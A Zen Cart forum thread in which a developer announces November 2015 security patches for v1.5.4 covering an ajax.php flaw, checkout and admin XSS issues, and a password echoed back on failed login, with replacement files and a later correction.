Results 1 to 2 of 2
  1. #1
    Join Date
    Jan 2004
    Posts
    66,364
    Blog Entries
    7
    Plugin Contributions
    274

    Default Security Patches for v1.5.4 - November 2015

    While it's never pleasant to report about security problems, today we are announcing a few patches which should be applied to your Zen Cart store.


    1. Problem with /ajax.php in v1.5.4 only - Severity: High
    In Zen Cart v1.5.4 the /ajax.php file has a vulnerability which can be used to cause a server exploit under very specific conditions.
    The patch is simple: replace the /ajax.php file with the one attached below.
    Thanks to High Tech Bridge for reporting the problem.

    QUICK PATCH TO APPLY: /ajax.php


    Below are some additional lower-severity patches affecting prior versions, which should be reviewed carefully for your site, to merge with existing customizations you may have made:

    2. XSS problem for unsanitized comment field - Severity: Medium
    In Zen Cart versions up to and including v1.5.4 an XSS problem exists with the order-comments field.
    XSS problems are where someone can drop in executable/javascript code that can cause problems later when that content is output back to the screen.
    The fix for this is a simple one-line patch to /includes/modules/pages/checkout_confirmation/header_php.php, as shown in this code diff: XSS fix
    Thanks to Trustwave Security for alerting us to this issue.
    The attached checkout_confirmation header_php.php is for v1.3.9-thru-v1.5.4 only. Older versions should be patched manually using the code diff in the link above.
    Patched file: /includes/modules/pages/checkout_confirmation/header_php.php


    3. Failed customer login puts password back in input box - Severity: Low
    When attempting a login with an invalid password, the resulting response contains that invalid password.
    The fix for this is a simple edit to the /includes/functions/html_output.php file, as shown in this code diff: XSS fix
    For v1.5.4 one can apply the attached html_output.php file to /includes/functions/html_output.php ... or if you've customized that file via plugins, use the above code-diff link to find the one line to change.
    Thanks to Trustwave Security for alerting us to this issue.

    Patched file: /includes/functions/html_output.php


    4. XSS concerns on the Admin side - Severity: Low because of working CSRF protections.
    Trustwave Security has reported that some fields on admin edit screens are at risk of XSS exploitation. A patch is being prepared, but it is important to note that none of these concerns can be exploited without having a valid Admin login already. So, the problems could only be caused by persons already having permission to access the admin area and intentionally placing malicious code into the affected fields. The Zen Cart Admin area is already protected against CSRF vulnerabilities so these XSS issues cannot be exploited by third parties.
    A further announcement will be posted when the patch is ready.
    .

    Zen Cart - putting the dream of business ownership within reach of anyone!
    Donate to: DrByte directly or to the Zen Cart team as a whole

    Remember: Any code suggestions you see here are merely suggestions. You assume full responsibility for your use of any such suggestions, including any impact ANY alterations you make to your site may have on your PCI compliance.
    Furthermore, any advice you see here about PCI matters is merely an opinion, and should not be relied upon as "official". Official PCI information should be obtained from the PCI Security Council directly or from one of their authorized Assessors.

  2. #2
    Join Date
    Jan 2004
    Posts
    66,364
    Blog Entries
    7
    Plugin Contributions
    274

    Default Re: Security Patches for v1.5.4 - November 2015

    Terribly sorry, there was an error in the first ajax.php file previously attached above.

    It's been updated above, and I'm attaching it again here:

    REVISED AJAX.PHP FILE: /ajax.php
    .

    Zen Cart - putting the dream of business ownership within reach of anyone!
    Donate to: DrByte directly or to the Zen Cart team as a whole

    Remember: Any code suggestions you see here are merely suggestions. You assume full responsibility for your use of any such suggestions, including any impact ANY alterations you make to your site may have on your PCI compliance.
    Furthermore, any advice you see here about PCI matters is merely an opinion, and should not be relied upon as "official". Official PCI information should be obtained from the PCI Security Council directly or from one of their authorized Assessors.

 

 

Similar Threads

  1. Ajax security fix November 2015
    By brittainmark in forum Bug Reports
    Replies: 9
    Last Post: 13 May 2016, 04:50 AM
  2. Replies: 6
    Last Post: 5 Dec 2015, 09:29 PM
  3. Security Patches for v1.3.0x
    By DrByte in forum Zen Cart Release Announcements
    Replies: 1
    Last Post: 18 Aug 2006, 02:29 PM

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
disjunctive-egg
Zen-Cart, Internet Selling Services, Klamath Falls, OR